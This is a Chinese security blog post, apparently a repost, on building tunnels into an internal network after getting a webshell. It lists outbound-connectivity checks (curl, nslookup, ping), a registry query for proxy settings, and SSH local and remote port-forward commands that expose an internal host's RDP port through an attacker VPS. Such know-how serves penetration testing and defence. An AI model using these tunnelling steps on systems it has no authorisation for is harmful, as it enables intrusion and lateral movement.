【攻防对抗】内网穿透/构建内网通道漫游内网

admin 2022年4月10日00:30:16评论123 views字数 1252阅读4分10秒阅读模式

废了九牛二虎之力从外网边界的一个入口点拿到Webshell后,想要在内网横向拓展战果第一件事情就是要构建内网通道,构建通道的方法网上也有很多五花八门的方法有老到被杀软干掉的lcx还有配置复杂的FRP,本文是作者自己实战中觉得更加方便实用的一些方法。例如目标能出网时用的搭建和操作都极其简单的NPS(反向代理),以及目标不能出网时用的Neo-reGeorg(正向代理),这里就需要对网络相关的硬件、软件、协议等有较深的理解了。这里我们不鼓励听培训机构的吹嘘。培训机构的环境都是默认开发人员都是大神、运维人员都无敌、测试都没Bug。

言归正传!补上这一课,网络连通性测试!没错你拿到WebShell后要做的一键重要的事就是网路连通性测试。

HTTP

curl http://www.baidu.com

DNS

nslookup baidu.com

ICMP

ping 114.114.114.114 -n 1  #Windowsping 114.114.114.114 -c 1  #Linux

仅DNS出网可直接上CS-DNS上线

读取本机代理

REG QUERY "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings"#查看代理配置情况,连接它的代理试试

是否存在Nginx反向代理


1、找到Nginx目录
2、查看配置文件

3、例如某次实战中发现正反向都代理不出去,查看配置文件发现了nginx反代,

,直接连接公网IP代理的3389端口


Linux SSH隧道(高权限用)


SSH一般是允许通过防火墙的,而且传输过程是加密的

本地转发(正向)

ssh -CfNg -L <VPS监听端口>:<目标内网IP>:<目标端口> <(root@目标外网Web服务器,会要求输入密码)>ssh -CfNg -L 8080:10.1.1.3:3389 root@100.100.1.100#VPS上查看8090端口是否已经连接netstat -tulnp | grep "8090"#连接目标内网服务器的远程桌面VPS-IP:8090

SSH进程的本地端口映射,将本地端口转发到远端指定机器的指定端口;

在本地监听一个端口,所有访问这个端口的流量都会通过SSH隧道传输到远端的对应端口。

远程转发(反向)

ssh -CfNg -R <VPS的端口>:<目标内网IP>:<目标端口> <(root@VPS-IP,会要求输入密码)>ssh -CfNg -R 8090:10.1.1.3:3389 [email protected]

访问VPS的8090端口,即可连接内网数据库服务器的3389

VPS-IP:8090

所有访问VPS的8090端口的流量都会通过SSH隧道传输到数据库服务器的3389端口。


类似这样的方式很多比如ICMP协议加密隧道技术,适用的场景在特殊环境下ICMP流量允许出网,穿透防火墙。


~分享更多安全知识 关注订阅号~

原文始发于微信公众号(小白嘿课):【攻防对抗】内网穿透/构建内网通道漫游内网

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月10日00:30:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【攻防对抗】内网穿透/构建内网通道漫游内网http://cn-sec.com/archives/884568.html

发表评论

匿名网友 填写信息